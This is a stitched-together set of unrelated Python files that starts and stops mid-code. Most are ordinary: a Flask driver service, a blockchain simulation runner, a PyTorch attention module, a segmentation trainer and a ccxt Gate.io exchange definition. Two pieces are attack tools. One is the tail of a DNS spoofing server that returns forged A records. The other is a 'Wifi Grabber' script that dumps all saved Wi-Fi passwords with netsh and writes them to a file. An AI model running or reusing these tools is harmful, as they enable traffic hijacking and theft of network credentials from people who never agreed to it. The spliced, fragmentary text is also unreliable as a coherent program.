dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.') # resp.answer.append(rrset) # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.') # resp.answer.append(rrset) rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname]) resp.answer.append(rrset) return resp def make_response(qry=None, id=None, RCODE=0): if qry is None and id is None: raise Exception, 'bad use of make_response' if qry is None: resp = dns.message.Message(id) # QR = 1 resp.flags |= dns.flags.QR if RCODE != 1: raise Exception, 'bad use of make_response' else: resp = dns.message.make_response(qry) resp.flags |= dns.flags.AA resp.flags |= dns.flags.RA resp.set_rcode(RCODE) return resp process_files() Resolver.reset() Resolver.read_resolv_conf(RESOLVCONF) signal.signal(signal.SIGUSR1, SIGUSR1_handle) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('', 53)) if Forward: DEBUGLOG('DNS Forwarding activado....') else: DEBUGLOG('DNS Forwarding desactivado....') DEBUGLOG('binded to UDP port 53.') serving_ids = [] noserv = True if ip1 is not None and ip2 is not None and Forward: sniff = ThreadSniffer() sniff.start() while True: if noserv: DEBUGLOG('waiting requests.') try: message, address = s.recvfrom(1024) noserv = True except socket.error as (code, msg): if code != errno.EINTR: raise if noserv: DEBUGLOG('serving a request.') requestHandler(address, message)
from xml.etree.ElementTree import TreeBuilder from app.models.entities.driver import Driver from app.models.entities.vehicle import Vehicle from app.models.result import Result from app.extensions import db from app.models.view.driver_view_model import DriverViewModel class DriverService: def __init__(self) -> None: pass def insert_driver(self, driver: Driver) -> Result: result = driver.is_valid() if not result.success: return result driverAlreadyExistsByName = Driver.query.filter_by(name=driver.name).first() if driverAlreadyExistsByName: return Result(success=False, message="Ja existe um motorista cadastrado com o nome informado!") driverAlreadyExistsByCPF = Driver.query.filter_by(cpf=driver.cpf).first() if driverAlreadyExistsByCPF: return Result(success=False, message="Ja existe um motorista cadastrado com o cpf informado!") db.session.add(driver) db.session.commit() return Result(success= True, message= "Motorista registrado com sucesso!") def update_driver(self, current_driver: Driver, driver_view: DriverViewModel): current_driver.fill_update(driver_view) result = current_driver.is_valid() if not result.success: return result db.session.commit() return Result(success=True, message="Motorista atualizado com sucesso!") def delete_driver(self, driver: Driver): vehicle = Vehicle.query.filter_by(driver_id=driver.id).first() if vehicle != None: return Result(success=False, message='''Existem veiculos cadastradados com este motorista! Delete antes os veiculos associados para deletar o motorista.''') db.session.delete(driver) db.session.commit() return Result(success=True, message="Motorista deletado com sucesso!") def get_all(self): return Driver.query.all()
# This file is part of the Blockchain Data Trading Simulator # https://gitlab.com/MatthiasLohr/bdtsim # # Copyright 2021 Matthias Lohr <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import logging import multiprocessing import os from multiprocessing.pool import ApplyResult from typing import Any, Dict, Optional, Tuple from queue import Queue import yaml from bdtsim.account import AccountFile from bdtsim.data_provider import DataProviderManager from bdtsim.environment import EnvironmentManager from bdtsim.protocol import ProtocolManager, DEFAULT_ASSET_PRICE from bdtsim.renderer import RendererManager from bdtsim.simulation import Simulation from bdtsim.simulation_result import SimulationResult, SimulationResultSerializer from bdtsim.util.types import to_bool from .command_manager import SubCommand DEFAULT_ENVIRONMENT_CONFIGURATION: Dict[str, Any] = {'name': 'PyEVM'} DEFAULT_DATA_PROVIDER_CONFIGURATION: Dict[str, Any] = {'name': 'RandomDataProvider'} logger = logging.getLogger(__name__) class BulkExecuteSubCommand(SubCommand): help = 'bulk execute simulations and renderings' def __init__(self, parser: argparse.ArgumentParser) -> None: super(BulkExecuteSubCommand, self).__init__(parser) parser.add_argument('bulk_configuration') parser.add_argument('-p', '--processes', type=int, default=multiprocessing.cpu_count()) def __call__(self, args: argparse.Namespace) -> Optional[int]: with open(args.bulk_configuration, 'r') as fp: bulk_configuration = yaml.load(fp, Loader=yaml.SafeLoader) logger.info('creating process pool with %i processes' % args.processes) process_pool = multiprocessing.Pool(processes=args.processes) processes: Queue[ApplyResult[Any]] = Queue() simulation_configurations = bulk_configuration.get('simulations') if not isinstance(simulation_configurations, list): raise ValueError('simulations is not a list') renderer_configurations = bulk_configuration.get('renderers') if not isinstance(simulation_configurations, list): raise ValueError('renderers is not a list') target_directory = bulk_configuration.get('target_directory', 'bulk_output') os.makedirs(target_directory, exist_ok=True) def renderer_success_callback(params: Tuple[Dict[str, Any], Dict[str, Any], bytes]) -> None: sim_conf, renderer_conf, result = params logger.info('renderer succeeded (%s, %s)' % (str(sim_conf), str(renderer_conf))) with open(os.path.join( target_directory, self.get_output_filename(sim_conf, renderer_conf, suffix=renderer_conf.get('suffix')) ), 'wb') as f: f.write(result) def renderer_error_callback(error: BaseException) -> None: logger.warning('renderer error: %s' % str(error)) def simulation_success_callback(params: Tuple[Dict[str, Any], SimulationResult]) -> None: local_simulation_configuration, result = params logger.info('simulation succeeded (%s)' % str(local_simulation_configuration)) logger.debug('writing down result') with open(os.path.join( target_directory, self.get_output_filename(local_simulation_configuration, suffix='result') ), 'wb') as f: simulation_result_serializer = SimulationResultSerializer( compression=to_bool(bulk_configuration.get('output_compression', True)), b64encoding=to_bool(bulk_configuration.get('output_b64encoding', True)) ) f.write(simulation_result_serializer.serialize(result)) logger.debug('scheduling renderers') for renderer_configuration in renderer_configurations: processes.put(process_pool.apply_async( func=self.run_renderer, kwds={ 'simulation_configuration': local_simulation_configuration, 'renderer_configuration': renderer_configuration, 'simulation_result': result }, callback=renderer_success_callback, error_callback=renderer_error_callback )) def simulation_error_callback(error: BaseException) -> None: logger.warning('simulation error callback called: %s' % str(error)) logger.debug('scheduling simulations') for simulation_configuration in simulation_configurations: processes.put(process_pool.apply_async( func=self.run_simulation, kwds={ 'simulation_configuration': simulation_configuration }, callback=simulation_success_callback, error_callback=simulation_error_callback )) while not processes.empty(): process = processes.get(block=True) process.wait() return 0 @staticmethod def run_simulation(simulation_configuration: Dict[str, Any]) -> Tuple[Dict[str, Any], SimulationResult]: protocol_configuration = simulation_configuration.get('protocol') environment_configuration = simulation_configuration.get('environment') data_provider_configuration = simulation_configuration.get('data_provider') if protocol_configuration is None: raise ValueError('missing protocol configuration') if environment_configuration is None: environment_configuration = DEFAULT_ENVIRONMENT_CONFIGURATION if data_provider_configuration is None: data_provider_configuration = DEFAULT_DATA_PROVIDER_CONFIGURATION protocol = ProtocolManager.instantiate( name=protocol_configuration.get('name', ''), **protocol_configuration.get('parameters', {}) ) account_file = AccountFile(simulation_configuration.get('account_file')) environment = EnvironmentManager.instantiate( name=environment_configuration.get('name', ''), operator=account_file.operator, seller=account_file.seller, buyer=account_file.buyer, **environment_configuration.get('parameters', {}) ) data_provider = DataProviderManager.instantiate( name=data_provider_configuration.get('name', ''), **data_provider_configuration.get('parameters', {}) ) simulation = Simulation( protocol=protocol, environment=environment, data_provider=data_provider, operator=account_file.operator, seller=account_file.seller, buyer=account_file.buyer, protocol_path_coercion=simulation_configuration.get('protocol_path'), price=simulation_configuration.get('price', DEFAULT_ASSET_PRICE), ) simulation_result = simulation.run() return simulation_configuration, simulation_result @staticmethod def run_renderer(simulation_configuration: Dict[str, Any], renderer_configuration: Dict[str, Any], simulation_result: SimulationResult) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]: renderer = RendererManager.instantiate( name=renderer_configuration.get('name', ''), **renderer_configuration.get('parameters', {}) ) result = renderer.render(simulation_result) return simulation_configuration, renderer_configuration, result @staticmethod def get_output_filename(simulation_configuration: Dict[str, Any], renderer_configuration: Optional[Dict[str, Any]] = None, suffix: Optional[str] = None) -> str: def component2str(component_config: Dict[str, Any]) -> str: result = str(component_config.get('name')) parameter_lines = [] for key, value in component_config.get('parameters', {}).items(): parameter_lines.append('%s=%s' % (key, value)) if len(parameter_lines): result += '-%s' % '-'.join(parameter_lines) return result output = '_'.join([ component2str(simulation_configuration.get('protocol', {})), component2str(simulation_configuration.get('environment', {})), component2str(simulation_configuration.get('data_provider', DEFAULT_DATA_PROVIDER_CONFIGURATION)) ]) if renderer_configuration is not None: output += '_%s' % component2str(renderer_configuration) if suffix is not None: output += '.%s' % suffix return output
import pyross.tsi.deterministic
""" Raspberry Pi tests. """
import torch import torch.nn as nn class ACM(nn.Module): # def __init__(self, in_channels, num_heads=32, orthogonal_loss=True): def __init__(self, in_channels, num_heads=8, orthogonal_loss=True): super(ACM, self).__init__() assert in_channels % num_heads == 0 self.in_channels = in_channels self.num_heads = num_heads self.add_mod = AttendModule(self.in_channels, num_heads=num_heads) self.sub_mod = AttendModule(self.in_channels, num_heads=num_heads) self.mul_mod = ModulateModule(channel=self.in_channels, num_groups=num_heads, compressions=2) self.orthogonal_loss = orthogonal_loss self.init_parameters() def init_parameters(self): if self.add_mod is not None: self.add_mod.init_parameters() if self.sub_mod is not None: self.sub_mod.init_parameters() if self.mul_mod is not None: self.mul_mod.init_parameters() def forward(self, x): mu = x.mean([2, 3], keepdim=True) x_mu = x - mu # creates multipying feature mul_feature = self.mul_mod(mu) # P # creates add or sub feature add_feature = self.add_mod(x_mu) # K # creates add or sub feature sub_feature = self.sub_mod(x_mu) # Q y = (x + add_feature - sub_feature) * mul_feature if self.orthogonal_loss: dp = torch.mean(add_feature * sub_feature, dim=1, keepdim=True) return y, dp else: return y class AttendModule(nn.Module): def __init__(self, in_channels, num_heads=4): super(AttendModule, self).__init__() self.num_heads = int(num_heads) self.in_channels = in_channels self.num_c_per_head = self.in_channels // self.num_heads assert self.in_channels % self.num_heads == 0 self.map_gen = nn.Sequential( nn.Conv2d(in_channels, num_heads, kernel_size=1, stride=1, padding=0, bias=True, groups=num_heads) ) self.normalize = nn.Softmax(dim=2) self.return_weight = False def init_parameters(self): for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') nn.init.constant_(m.bias, 0.0) def batch_weighted_avg(self, xhats, weights): b, c, h, w = xhats.shape # xhat reshape xhats_reshape = xhats.view(b * self.num_heads, self.num_c_per_head, h, w) xhats_reshape = xhats_reshape.view(b * self.num_heads, self.num_c_per_head, h * w) # weight reshape weights_reshape = weights.view(b * self.num_heads, 1, h, w) weights_reshape = weights_reshape.view(b * self.num_heads, 1, h * w) weights_normalized = self.normalize(weights_reshape) weights_normalized = weights_normalized.transpose(1, 2) mus = torch.bmm(xhats_reshape, weights_normalized) mus = mus.view(b, self.num_heads * self.num_c_per_head, 1, 1) return mus, weights_normalized def forward(self, x): b, c, h, w = x.shape weights = self.map_gen(x) mus, weights_normalized = self.batch_weighted_avg(x, weights) if self.return_weight: weights_normalized = weights_normalized.view(b, self.num_heads, h * w, 1) weights_normalized = weights_normalized.squeeze(-1) weights_normalized = weights_normalized.view(b, self.num_heads, h, w) weights_splitted = torch.split(weights_normalized, 1, 1) return mus, weights_splitted return mus class ModulateModule(nn.Module): def __init__(self, channel, num_groups=32, compressions=2): super(ModulateModule, self).__init__() self.feature_gen = nn.Sequential( nn.Conv2d(channel, channel//compressions, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups), nn.ReLU(inplace=True), nn.Conv2d(channel//compressions, channel, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups), nn.Sigmoid() ) def init_parameters(self): for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') nn.init.constant_(m.bias, 0.0) def forward(self, x): y = self.feature_gen(x) return y if __name__ == '__main__': x1 = torch.randn(256 * 20 * 20 * 5).view(5, 256, 20, 20).float() acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=True) acm.init_parameters() y, dp = acm(x1) print(y.shape) print(dp.shape) # ACM without orthogonal loss acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=False) acm.init_parameters() y = acm(x1) print(y.shape)
import subprocess import time import os localtime = time.asctime( time.localtime(time.time())) data = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\n') profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i] file = open("result.txt", "a") print("\n[+] Wifi Grabber: " + localtime + "\n") file.write("\n[+] Wifi Grabber: " + localtime + "\n") print("========================================================",file=file) print(localtime, file=file) print("========================================================",file=file) file.close for i in profiles: results = subprocess.check_output(['netsh','wlan','show','profile',i, 'key=clear']).decode("utf-8").split('\n') results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b] try: print("{:<30} | {:<}".format(i, results[0]),file=file) file.close except IndexError: print("{:<30} | {:<}".format(i, "")) time.sleep(3) exit(code=True)
########################################################################### # Created by: Hang Zhang # Email: [email protected] # Copyright (c) 2017 ########################################################################### import os, sys BASE_DIR = os.path.dirname(os.path.dirname(os.getcwd())) sys.path.append(BASE_DIR) import yaml import argparse import numpy as np from addict import Dict import torch import torch.nn as nn from torch.utils import data from tensorboardX import SummaryWriter import torchvision.transforms as transform from torch.nn.parallel.scatter_gather import gather import encoding.utils as utils from encoding.nn import SegmentationLosses, SyncBatchNorm from encoding.parallel import DataParallelModel, DataParallelCriterion from encoding.datasets import get_dataset from encoding.models import get_segmentation_model CONFIG_PATH = './results/config.yaml' SMY_PATH = os.path.dirname(CONFIG_PATH) GPUS = [0, 1] # model settings parser = argparse.ArgumentParser(description='model specification') parser.add_argument('--with_att', action='store_true', default= False, help='whether use attention to fuse rgb and dep') parser.add_argument('--att_type', type=str, default='AG2', help='Attention type to fuse rgb and dep') settings= parser.parse_args() print('settings attention:{} attention type:{}'.format(settings.with_att, settings.att_type)) class Trainer(): def __init__(self, args): self.args = args # data transforms input_transform = transform.Compose([ transform.ToTensor(), # convert RGB [0,255] to FloatTensor in range [0, 1] transform.Normalize([.485, .456, .406], [.229, .224, .225])]) # mean and std based on imageNet dep_transform = transform.Compose([ transform.ToTensor(), transform.Normalize(mean=[0.2798], std=[0.1387]) # mean and std for depth ]) # dataset data_kwargs = {'transform': input_transform, 'dep_transform': dep_transform, 'base_size': args.base_size, 'crop_size': args.crop_size} trainset = get_dataset(args.dataset, split=args.train_split, mode='train', **data_kwargs) testset = get_dataset(args.dataset, split='val', mode='val', **data_kwargs) # dataloader kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {} self.trainloader = data.DataLoader(trainset, batch_size=args.batch_size, drop_last=True, shuffle=True, **kwargs) self.valloader = data.DataLoader(testset, batch_size=args.batch_size, drop_last=False, shuffle=False, **kwargs) self.nclass = trainset.num_class # model and params model = get_segmentation_model(args.model, dataset=args.dataset, backbone=args.backbone, pretrained=True, root='../../encoding/models/pretrain', n_features=256, with_att=settings.with_att, att_type=settings.att_type, ) print(model) # optimizer using different LR base_ids = list(map(id, model.base.parameters())) base_dep_ids = list(map(id, model.dep_base.parameters())) base_params = filter(lambda p: id(p) in base_ids + base_dep_ids, model.parameters()) other_params = filter(lambda p: id(p) not in base_ids + base_dep_ids, model.parameters()) self.optimizer = torch.optim.SGD([{'params': base_params, 'lr': args.lr}, {'params': other_params, 'lr': args.lr * 10}], lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay) # criterions self.criterion = SegmentationLosses(se_loss=args.se_loss, aux=args.aux, nclass=self.nclass, se_weight=args.se_weight, aux_weight=args.aux_weight) # lr scheduler self.scheduler = utils.LR_Scheduler_Head(args.lr_scheduler, args.lr, args.epochs, iters_per_epoch=len(self.trainloader), warmup_epochs=10) self.best_pred = 0.0 # using cuda self.device = torch.device("cuda:0" if args.cuda else "cpu") if args.cuda: if torch.cuda.device_count() > 1: print("Let's use", torch.cuda.device_count(), "GPUs!") # [30,xxx]->[10,...],[10,...],[10,...] on 3 GPUs model = nn.DataParallel(model, device_ids=GPUS) self.model = model.to(self.device) # for writing summary path = "/".join(("{}-{}".format(*i) for i in settings.__dict__.items())) self.writer = SummaryWriter(os.path.join(SMY_PATH, path)) # resuming checkpoint if args.resume is not None and args.resume != 'None': if not os.path.isfile(args.resume): raise RuntimeError("=> no checkpoint found at '{}'".format(args.resume)) checkpoint = torch.load(args.resume) args.start_epoch = checkpoint['epoch'] if args.cuda: self.model.module.load_state_dict(checkpoint['state_dict']) else: self.model.load_state_dict(checkpoint['state_dict']) if not args.ft: self.optimizer.load_state_dict(checkpoint['optimizer']) self.best_pred = checkpoint['best_pred'] print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch'])) # clear start epoch if fine-tuning if args.ft: args.start_epoch = 0 def training(self, epoch): train_loss = 0.0 self.model.train() total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0 for i, (image, dep, target) in enumerate(self.trainloader): image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device) self.scheduler(self.optimizer, i, epoch, self.best_pred) self.optimizer.zero_grad() outputs = self.model(image, dep) loss = self.criterion(outputs, target) loss.backward() self.optimizer.step() correct, labeled = utils.batch_pix_accuracy(outputs.data, target) inter, union = utils.batch_intersection_union(outputs.data, target, self.nclass) total_correct += correct total_label += labeled total_inter += inter total_union += union train_loss += loss.item() if (i+1) % 50 == 0: print('epoch {}, step {}, loss {}'.format(epoch + 1, i + 1, train_loss / 50)) self.writer.add_scalar('train_loss', train_loss / 50, epoch * len(self.trainloader) + i) train_loss = 0.0 pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label) IOU = 1.0 * total_inter / (np.spacing(1) + total_union) mIOU = IOU.mean() print('epoch {}, pixel Acc {}, mean IOU {}'.format(epoch + 1, pixAcc, mIOU)) self.writer.add_scalar("mean_iou/train", mIOU, epoch) self.writer.add_scalar("pixel accuracy/train", pixAcc, epoch) def train_n_evaluate(self): for epoch in range(self.args.epochs): # run on one epoch print("\n===============train epoch {}/{} ==========================\n".format(epoch, self.args.epochs)) # one full pass over the train set self.training(epoch) # evaluate for one epoch on the validation set print('\n===============start testing, training epoch {}\n'.format(epoch)) pixAcc, mIOU, loss = self.validation(epoch) print('evaluation pixel acc {}, mean IOU {}, loss {}'.format(pixAcc, mIOU, loss)) # save the best model is_best = False new_pred = (pixAcc + mIOU) / 2 if new_pred > self.best_pred: is_best = True self.best_pred = new_pred utils.save_checkpoint({'epoch': epoch + 1, 'state_dict': self.model.module.state_dict(), 'optimizer': self.optimizer.state_dict(), 'best_pred': self.best_pred}, self.args, is_best) def validation(self, epoch): # Fast test during the training def eval_batch(model, image, dep, target): # model, image, target already moved to gpus pred = model(image, dep) loss = self.criterion(pred, target) correct, labeled = utils.batch_pix_accuracy(pred.data, target) inter, union = utils.batch_intersection_union(pred.data, target, self.nclass) return correct, labeled, inter, union, loss self.model.eval() total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0 for i, (image, dep, target) in enumerate(self.valloader): image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device) with torch.no_grad(): correct, labeled, inter, union, loss = eval_batch(self.model, image, dep, target) total_correct += correct total_label += labeled total_inter += inter total_union += union total_loss += loss.item() pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label) IOU = 1.0 * total_inter / (np.spacing(1) + total_union) mIOU = IOU.mean() if i % 40 == 0: print('eval mean IOU {}'.format(mIOU)) loss = total_loss / len(self.valloader) self.writer.add_scalar("mean_iou/val", mIOU, epoch) self.writer.add_scalar("pixel accuracy/val", pixAcc, epoch) return pixAcc, mIOU, loss if __name__ == "__main__": print("-------mark program start----------") # configuration args = Dict(yaml.safe_load(open(CONFIG_PATH))) args.cuda = (args.use_cuda and torch.cuda.is_available()) args.resume = None if args.resume=='None' else args.resume torch.manual_seed(args.seed) trainer = Trainer(args) # import pdb; pdb.set_trace() print('Starting Epoch:', trainer.args.start_epoch) print('Total Epoches:', trainer.args.epochs) trainer.train_n_evaluate()
# -*- coding: utf-8 -*- # PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN: # https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code from ccxt.base.exchange import Exchange import hashlib from ccxt.base.errors import ExchangeError from ccxt.base.errors import AuthenticationError from ccxt.base.errors import PermissionDenied from ccxt.base.errors import AccountSuspended from ccxt.base.errors import ArgumentsRequired from ccxt.base.errors import BadRequest from ccxt.base.errors import BadSymbol from ccxt.base.errors import InsufficientFunds from ccxt.base.errors import InvalidOrder from ccxt.base.errors import OrderNotFound from ccxt.base.errors import RateLimitExceeded from ccxt.base.errors import ExchangeNotAvailable from ccxt.base.decimal_to_precision import TICK_SIZE from ccxt.base.precise import Precise class gateio(Exchange): def describe(self): return self.deep_extend(super(gateio, self).describe(), { 'id': 'gateio', 'name': 'Gate.io', 'countries': ['KR'], 'rateLimit': 10 / 3, # 300 requests per second or 3.33ms 'version': 'v4', 'certified': True, 'pro': True, 'urls': { 'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg', 'doc': 'https://www.gate.io/docs/apiv4/en/index.html', 'www': 'https://gate.io/', 'api': { 'public': 'https://api.gateio.ws/api/v4', 'private': 'https://api.gateio.ws/api/v4', }, 'referral': { 'url': 'https://www.gate.io/ref/2436035', 'discount': 0.2, }, }, 'has': { 'cancelOrder': True, 'createMarketOrder': False, 'createOrder': True, 'fetchBalance': True, 'fetchClosedOrders': True, 'fetchCurrencies': True, 'fetchDeposits': True, 'fetchFundingRate': True, 'fetchFundingRateHistory': True, 'fetchFundingRates': True, 'fetchIndexOHLCV': True, 'fetchMarkets': True, 'fetchMarkOHLCV': True, 'fetchMyTrades': True, 'fetchOHLCV': True, 'fetchOpenOrders': True, 'fetchOrder': True, 'fetchPremiumIndexOHLCV': False, 'fetchTicker': True, 'fetchTickers': True, 'fetchTime': False, 'fetchTrades': True, 'fetchWithdrawals': True, 'transfer': True, 'withdraw': True, }, 'api': { 'public': { 'spot': { 'get': { 'currencies': 1, 'currencies/{currency}': 1, 'currency_pairs': 1, 'currency_pairs/{currency_pair}': 1, 'tickers': 1, 'order_book': 1, 'trades': 1, 'candlesticks': 1, }, }, 'margin': { 'get': { 'currency_pairs': 1, 'currency_pairs/{currency_pair}': 1, 'cross/currencies': 1, 'cross/currencies/{currency}': 1, }, }, 'futures': { 'get': { '{settle}/contracts': 1.5, '{settle}/contracts/{contract}': 1.5, '{settle}/order_book': 1.5, '{settle}/trades': 1.5, '{settle}/candlesticks': 1.5, '{settle}/tickers': 1.5, '{settle}/funding_rate': 1.5, '{settle}/insurance': 1.5, '{settle}/contract_stats': 1.5, '{settle}/liq_orders': 1.5, }, }, 'delivery': { 'get': { '{settle}/contracts': 1.5, '{settle}/contracts/{contract}': 1.5, '{settle}/order_book': 1.5, '{settle}/trades': 1.5, '{settle}/candlesticks': 1.5, '{settle}/tickers': 1.5, '{settle}/insurance': 1.5, }, }, }, 'private': { 'withdrawals': { 'post': { '': 3000, # 3000 = 10 seconds }, 'delete': { '{withdrawal_id}': 300, }, }, 'wallet': { 'get': { 'deposit_address': 300, 'withdrawals': 300, 'deposits': 300, 'sub_account_transfers': 300, 'withdraw_status': 300, 'sub_account_balances': 300, 'fee': 300, }, 'post': { 'transfers': 300, 'sub_account_transfers': 300, }, }, 'spot': { 'get': { 'accounts': 1, 'open_orders': 1, 'orders': 1, 'orders/{order_id}': 1, 'my_trades': 1, 'price_orders': 1, 'price_orders/{order_id}': 1, }, 'post': { 'batch_orders': 1, 'orders': 1, 'cancel_batch_orders': 1, 'price_orders': 1, }, 'delete': { 'orders': 1, 'orders/{order_id}': 1, 'price_orders': 1, 'price_orders/{order_id}': 1, }, }, 'margin': { 'get': { 'accounts': 1.5, 'account_book': 1.5, 'funding_accounts': 1.5, 'loans': 1.5, 'loans/{loan_id}': 1.5, 'loans/{loan_id}/repayment': 1.5, 'loan_records': 1.5, 'loan_records/{load_record_id}': 1.5, 'auto_repay': 1.5, 'transferable': 1.5, 'cross/accounts': 1.5, 'cross/account_book': 1.5, 'cross/loans': 1.5, 'cross/loans/{loan_id}': 1.5, 'cross/loans/repayments': 1.5, 'cross/transferable': 1.5, }, 'post': { 'loans': 1.5, 'merged_loans': 1.5, 'loans/{loan_id}/repayment': 1.5, 'auto_repay': 1.5, 'cross/loans': 1.5, 'cross/loans/repayments': 1.5, }, 'patch': { 'loans/{loan_id}': 1.5, 'loan_records/{loan_record_id}': 1.5, }, 'delete': { 'loans/{loan_id}': 1.5, }, }, 'futures': { 'get': { '{settle}/accounts': 1.5, '{settle}/account_book': 1.5, '{settle}/positions': 1.5, '{settle}/positions/{contract}': 1.5, '{settle}/orders': 1.5, '{settle}/orders/{order_id}': 1.5, '{settle}/my_trades': 1.5, '{settle}/position_close': 1.5, '{settle}/liquidates': 1.5, '{settle}/price_orders': 1.5, '{settle}/price_orders/{order_id}': 1.5, }, 'post': { '{settle}/positions/{contract}/margin': 1.5, '{settle}/positions/{contract}/leverage': 1.5, '{settle}/positions/{contract}/risk_limit': 1.5, '{settle}/dual_mode': 1.5, '{settle}/dual_comp/positions/{contract}': 1.5, '{settle}/dual_comp/positions/{contract}/margin': 1.5, '{settle}/dual_comp/positions/{contract}/leverage': 1.5, '{settle}/dual_comp/positions/{contract}/risk_limit': 1.5, '{settle}/orders': 1.5, '{settle}/price_orders': 1.5, }, 'delete': { '{settle}/orders': 1.5, '{settle}/orders/{order_id}': 1.5, '{settle}/price_orders': 1.5, '{settle}/price_orders/{order_id}': 1.5, }, }, 'delivery': { 'get': { '{settle}/accounts': 1.5, '{settle}/account_book': 1.5, '{settle}/positions': 1.5, '{settle}/positions/{contract}': 1.5, '{settle}/orders': 1.5, '{settle}/orders/{order_id}': 1.5, '{settle}/my_trades': 1.5, '{settle}/position_close': 1.5, '{settle}/liquidates': 1.5, '{settle}/price_orders': 1.5, '{settle}/price_orders/{order_id}': 1.5, }, 'post': { '{settle}/positions/{contract}/margin': 1.5, '{settle}/positions/{contract}/leverage': 1.5, '{settle}/positions/{contract}/risk_limit': 1.5, '{settle}/orders': 1.5, '{settle}/price_orders': 1.5, }, 'delete': { '{settle}/orders': 1.5, '{settle}/orders/{order_id}': 1.5, '{settle}/price_orders': 1.5, '{settle}/price_orders/{order_id}': 1.5, }, }, }, }, 'timeframes': { '10s': '10s', '1m': '1m', '5m': '5m', '15m': '15m', '30m': '30m', '1h': '1h', '4h': '4h', '8h': '8h', '1d': '1d', '7d': '7d', }, # copied from gateiov2 'commonCurrencies': { '88MPH': 'MPH', 'BIFI': 'Bitcoin File', 'BOX': 'DefiBox', 'BTCBEAR': 'BEAR', 'BTCBULL': 'BULL', 'BYN': 'Beyond Finance', 'EGG': 'Goose Finance', 'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin 'GTC_HT': 'Game.com HT', 'GTC_BSC': 'Game.com BSC', 'HIT': 'HitChain', 'MPH': 'Morpher', # conflict with 88MPH 'RAI': 'Rai Reflex Index', # conflict with RAI Finance 'SBTC': 'Super Bitcoin', 'STX': 'Stox', 'TNC': 'Trinity Network Credit', 'TON': 'TONToken', 'VAI': 'VAIOT', }, 'requiredCredentials': { 'apiKey': True, 'secret': True, }, 'options': { 'networks': { 'TRC20': 'TRX', 'ERC20': 'ETH', 'BEP20': 'BSC', }, 'accountsByType': { 'spot': 'spot', 'margin': 'margin', 'futures': 'futures', 'delivery': 'delivery', }, 'defaultType': 'spot', 'swap': { 'fetchMarkets': { 'settlementCurrencies': ['usdt', 'btc'], }, }, 'futures': { 'fetchMarkets': { 'settlementCurrencies': ['usdt', 'btc'], }, }, }, 'precisionMode': TICK_SIZE, 'fees': { 'trading': { 'tierBased': True, 'feeSide': 'get', 'percentage': True, 'maker': self.parse_number('0.002'), 'taker': self.parse_number('0.002'), 'tiers': { # volume is in BTC 'maker': [ [self.parse_number('0'), self.parse_number('0.002')], [self.parse_number('1.5'), self.parse_number('0.00185')], [self.parse_number('3'), self.parse_number('0.00175')], [self.parse_number('6'), self.parse_number('0.00165')], [self.parse_number('12.5'), self.parse_number('0.00155')], [self.parse_number('25'), self.parse_number('0.00145')], [self.parse_number('75'), self.parse_number('0.00135')], [self.parse_number('200'), self.parse_number('0.00125')], [self.parse_number('500'), self.parse_number('0.00115')], [self.parse_number('1250'), self.parse_number('0.00105')], [self.parse_number('2500'), self.parse_number('0.00095')], [self.parse_number('3000'), self.parse_number('0.00085')], [self.parse_number('6000'), self.parse_number('0.00075')], [self.parse_number('11000'), self.parse_number('0.00065')], [self.parse_number('20000'), self.parse_number('0.00055')], [self.parse_number('40000'), self.parse_number('0.00055')], [self.parse_number('75000'), self.parse_number('0.00055')], ], 'taker': [ [self.parse_number('0'), self.parse_number('0.002')], [self.parse_number('1.5'), self.parse_number('0.00195')], [self.parse_number('3'), self.parse_number('0.00185')], [self.parse_number('6'), self.parse_number('0.00175')], [self.parse_number('12.5'), self.parse_number('0.00165')], [self.parse_number('25'), self.parse_number('0.00155')], [self.parse_number('75'), self.parse_number('0.00145')], [self.parse_number('200'), self.parse_number('0.00135')], [self.parse_number('500'), self.parse_number('0.00125')], [self.parse_number('1250'), self.parse_number('0.00115')], [self.parse_number('2500'), self.parse_number('0.00105')], [self.parse_number('3000'), self.parse_number('0.00095')], [self.parse_number('6000'), self.parse_number('0.00085')], [self.parse_number('11000'), self.parse_number('0.00075')], [self.parse_number('20000'), self.parse_number('0.00065')], [self.parse_number('40000'), self.parse_number('0.00065')], [self.parse_number('75000'), self.parse_number('0.00065')], ], }, }, 'swap': { 'tierBased': True, 